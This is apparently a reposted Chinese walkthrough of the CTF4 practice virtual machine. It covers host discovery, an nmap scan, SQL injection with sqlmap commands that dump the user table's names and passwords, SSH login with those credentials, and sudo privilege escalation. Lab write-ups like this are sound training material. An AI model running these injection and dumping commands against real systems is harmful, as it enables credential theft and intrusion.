CTF4靶机训练

CTF4靶机训练

  • 环境下载
  • 主机发现
  • 端口扫描
  • 漏洞挖掘
  • SSH利用
  • 权限提升

环境下载

链接:https://pan.baidu.com/s/1Kb4RKtnZ5RD43FAnjlYlsg
提取码:d59k
Tips:首次打开虚拟机时要选择“我已移动该虚拟机”选项。
此次训练其中一步为获取目标的账号密码,故目标环境无需登录。

主机发现

使用命令:

netdiscover

CTF4靶机训练_第1张图片
CTF4靶机训练_第2张图片

端口扫描

使用命令:

namp -A -sS -sV -p- 目标主机IP

参数说明:
-A:详细扫描目标IP,加载所有脚本,尽可能地全面地探测信息。
-v:显示详细的扫描过程。
-sS:TCP SYN 扫描。
-sV:探测开放。
-p-:扫描全部端口。
CTF4靶机训练_第3张图片
扫描得出目标开放了端口:22(SSH服务),25(SMTO服务),80(HTTP服务)。

漏洞挖掘

对页面进行测试发现单引号报错
CTF4靶机训练_第4张图片
使用以下命令爆出表名:

sqlmap -u http://目标IP/index.html\?page\=blog\&title\=Blog\&id\=2 --tables

在这里插入图片描述
CTF4靶机训练_第5张图片
使用以下命令爆出字段:

sqlmap -u http://目标IP/index.html\?page\=blog\&title\=Blog\&id\=2 -D ehks --tables -T user --columns

在这里插入图片描述
CTF4靶机训练_第6张图片
使用以下命令爆出密码等数据:

sqlmap -u http://目标IP/index.html\?page\=blog\&title\=Blog\&id\=2 -D ehks --tables -T user --columns -C user_name,user_pass --dump

在这里插入图片描述
CTF4靶机训练_第7张图片

SSH利用

尝试使用获取到的账号登录SSH,成功登录,接下来进行进一步提权
在这里插入图片描述

权限提升

使用sudo命令进行提权
在这里插入图片描述
成功提权

使用sudo -l查看当前用户权限
在这里插入图片描述
成功提权

你可能感兴趣的:(CTF4靶机训练)